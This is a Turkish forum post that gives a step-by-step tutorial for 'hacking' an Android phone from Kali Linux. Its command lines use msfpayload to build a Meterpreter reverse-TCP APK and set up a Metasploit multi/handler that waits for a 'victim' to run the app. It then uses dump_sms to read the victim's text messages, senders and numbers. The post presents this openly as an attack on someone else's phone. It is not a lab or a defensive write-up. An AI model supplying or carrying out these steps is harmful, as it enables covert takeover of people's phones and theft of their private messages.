top of page

A.N.T BİLGİ PAYLAŞIM

Herkese Açık·342 üye

Selamunaleykum bugün sizlerle android telefon hacklemeyi göstericeğim direk konuya geçelim Android telefona sızma kali linux üzerinden Yapıyoruz. Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz . Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze. Adım 2 : ” msfconsole ” komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz . Komut ; use multi/handler . Adım 3 : Burada ise aşağıdaki kodları yazıyoruz . Komut ; > set payload android/meterpreter/reverse_tcp > show options > set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın) > set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz ) > exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.) Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için ” help ” komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta. Adım 6 : Örnek olarak telefondaki SMS’lere bakalım . Bunun için ” dump_sms ” komutunu kullanıyoruz. Adım 7 : Dosyamızı ” root ” klasör’üne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım. Adım 8 : Ve SMS’leri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik

Ibrahim Akdeniz
s27 isimsiz
Hamit Kılınç

Hakkında

Gruba hoş geldiniz! Diğer üyelerle bağlantı kurabilir, günce...

Üye

Konular

bottom of page